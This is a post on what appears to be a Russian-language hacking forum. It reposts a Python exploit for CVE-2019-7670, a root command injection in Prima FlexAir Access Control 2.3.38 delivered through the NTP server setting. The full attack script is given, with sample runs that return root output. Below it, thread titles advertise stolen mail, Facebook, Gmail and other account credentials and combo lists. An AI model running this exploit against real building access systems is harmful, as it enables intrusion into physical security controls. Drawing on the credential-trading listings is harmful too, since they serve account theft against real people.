Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Original poster
Pro Member
Сообщения
48
Реакции
23
Посетить сайт
# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text
 
Название темы
Автор Заголовок Раздел Ответы Дата
N MIX AMAZON ACCESS + BALANCE Раздача email 0
N MIX TINDER ACCESS Раздача email 0
N MIX INSTAGRAM ACCESS Раздача email 1
N MIX TINDER ACCESS Раздача email 0
N MIX [[email protected]] ACCESS Раздача email 0
N MIX FACEBOOK ACCESS Раздача email 0
N MIX INSTAGRAM ACCESS Раздача email 0
N MIX MAIL ACCESS FACEBOOK Раздача email 1
N MIX INSTAGRAM ACCESS Раздача email 1
N MIX FACEBOOK ACCESS Раздача email 0
M MIX 6k Fresh Oll Valid Mail Access 25.03.2024 Раздача email 0
M MIX 60k Fresh Privat Mail Access 24.03.2024 Раздача email 0
M Valid ║$║Privat║$║ Super Fresh Mail Access 24.03.2024║$║ Раздача email 0
M MIX 15K Soo Fresh Valid Mix Mail Access 23.02 Раздача email 0
M MIX Privat - FULL VALID MAIL ACCESS MIX EU║$║USA║$║ASIA║$║ Раздача email 0
M Valid ║$║30K SOO FRESH VALID MAIL ACCESS ║$║ 19.03║$║ Раздача email 0
M Valid 29K GOOD Fresh Valid Mail Access 13.03 Раздача email 0
G ║$║690000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║648000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║635000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║563000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║560000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║560000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║400000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║385000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
G ║$║344000 Fresh Goood Mail Access Mix ║$║ Good Fore Oll Корзина 0
M Valid 30kFresh Soo Valid MAIL ACCESS Раздача email 0
M Valid ║$║ SO FRESH VALID MAIL ACCESS OK BAUD ANY REQUEST ║$║ Раздача email 0
M Valid ║$║19K FRESH VALID MAIL ACCESS OK BAUD ANY REQUEST║$║ Раздача email 0
M Valid ║$║44k FRESH VALID MAIL ACCESS 03.30.2024║$║ Раздача email 0
M Valid 52k FRESH VALID MAIL ACCESS 02.03 Part 2 Раздача email 0
M Valid 52k FRESH VALID MAIL ACCESS 02.03 Раздача email 0
M Valid 52k FRESH VALOD MAIL ACCESS Mix Раздача email 0
M Valid 52k FRESH VALID MAIL ACCESS Раздача email 0
M Valid 70k FRESH Valid MAIL ACCESS MEGA CLOUD Раздача email 0
M Valid ║$║Valid Fresh ║$║ MAIL ACCESS ║$║ 29.02 ║$║ Раздача email 0
M Valid 70k PRIVATE & FRESH Mix Mail Access Раздача email 0
M Valid Valid Mix MAIL ACCESS COMBO 22.02 Раздача email 0
N MIX FACEBOOK ACCESS Раздача email 0
N Zabugor Combo Fresh №1✔️ FACEBOOK ADS ACCESS Раздача email 0
N MIX FACEBOOK ACCESS ADS Раздача email 0
N Zabugor COMBO FRESH №1✔️ FACEBOOK ADS MAIL ACCESS Раздача email 0
N MIX COMBO MAIL PASS FRESH №1✔️ FACEBOOK ADS CODE 8 ACCESS GOOD Раздача email 0
N MIX COMBO MAIL PASS FRESH №1✔️ FB ACCESS Раздача email 0
N Zabugor COMBO MAIL PASS FRESH №1✔️ FACEBOOK ACCESS Раздача email 1
N Zabugor COMBO MAIL PASS FRESH №1✔️ outlook.com ACCESS Раздача email 0
N Valid COMBO MAIL PASS FRESH №1✔️USA FACEBOOK ACCESS ADS+ CODE 8 Раздача email 0
N Valid VALID POLAND BASE ACCESS Раздача email 0
N Zabugor GMAIL PREMIUM ACCESS 500K Раздача email 1
N MIX GOOD FACEBOOK ACCESS ADS CODE 8 Раздача email 0

Название темы